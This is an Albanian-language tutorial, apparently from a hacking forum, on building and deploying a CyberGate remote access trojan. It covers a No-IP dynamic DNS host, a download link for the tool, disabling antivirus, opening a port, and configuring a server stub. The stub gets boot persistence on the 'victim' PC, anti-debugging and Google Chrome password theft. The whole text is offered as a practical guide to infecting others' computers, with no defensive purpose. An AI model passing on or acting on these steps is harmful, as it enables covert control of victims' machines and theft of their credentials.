ku eshte nje tutorial i krijuar nga une shpresoj tju ndihmoje 
Si fillim do hapim nje account tek No-ip.com (nqs nuk e kemi ende nje te tille )
Passi te jeni regjistruar duhet te shkoni tek Add a Host


Pasaj do vendosim emrin e hostit sipas deshires tuaj ne fund sygjeroj tani beni no-ip.biz tek Host Type do zgjidhni DNS Host (A) te tjerat nuk kane shume rendesi
Dhe ne fund kliko create host. Hosti tani u krijua.


Me pas downlodoni No-IP Client http://www.no-ip.com/downloads.php?page=win
Pasi ta keni downloduar insatojeni (instalimi eshte shume I thjeshte )
Pastoj do logohemi ktu me E-mailin dhe passwordin qe u regjistruat tek No-IP .com

Pasi te jeni loguar zgjidhni select a host 

Ktu do zgjidhni hostin tuaj dhe do I jepni save .. Kaq ishte dhe no-ip client

Me pas do downlodoni CyberGate v1.07.5 http://www.mediafire.com/?si7c4k81vr11h8n
Presim 20 sek sa te instalohet dhe duhet te caktivizojme antivirusin sepse e kap si virus kte program po ja siguroje qe nuk eshte I tille e perdor dhe vete 

Pasi te hapet klikojme tek Control center dhe Start

Me pas del nje tabele e tille per te aktivizuar portat

Mund te vendosni numrin e 1 porte cfare do dhe te klikoni unblock tek firewalli une zgjodha 100 

Ktu mund te zgjidhni kto qe kam zgjedhur une ose sipas deshires kur te mbaroni klikoni save

Pastaj klikojme Control Center -> Build -> Create Server
Ne fillim I vendosim nje emer cfare do dhe pasaj klikojme ne te dhe me pas Forword 

ME pas kalojme tek connetion …Japimm add dhe tek kjo tabela vendosim emrin e hostit qe krijuam ne fillim dhe porten qe hapem 100 ne rastin tone dhe japim ok.
Fshijme DNS qe ndodhej ne fillim duke klikuar tek ajo dhe pasaj delete .
Vendosim tek identification Cyber ..ndersa tek Password paswordin qe vendosem kur hapem porten tek cyber ne vendosem 123456

Pastaj kalojme tek installation dhe bejini kto si une 
Dhe tek random e active set up e bejme 5 here ne menyre qe sa here te ndezi pc viktima serveri juaj te aktivizohet ndersa tek Mutex mjaftone disa here

me pas kalojme tek anti-deburg dhe I japim check all 

Dhe ne fund create server bejeni dhe kto si ne foto 
Use icon …Delayed ececution 1 ….Google Chrome passwords ..dhe ne fund create server 

Kaq ju mjaftone te krijoni 1 rat pasaj do ju duhet vetem te port forwording qe do e beje 1 dite tjeter shpresoj tju kem ndihmuar flmm per vemendjen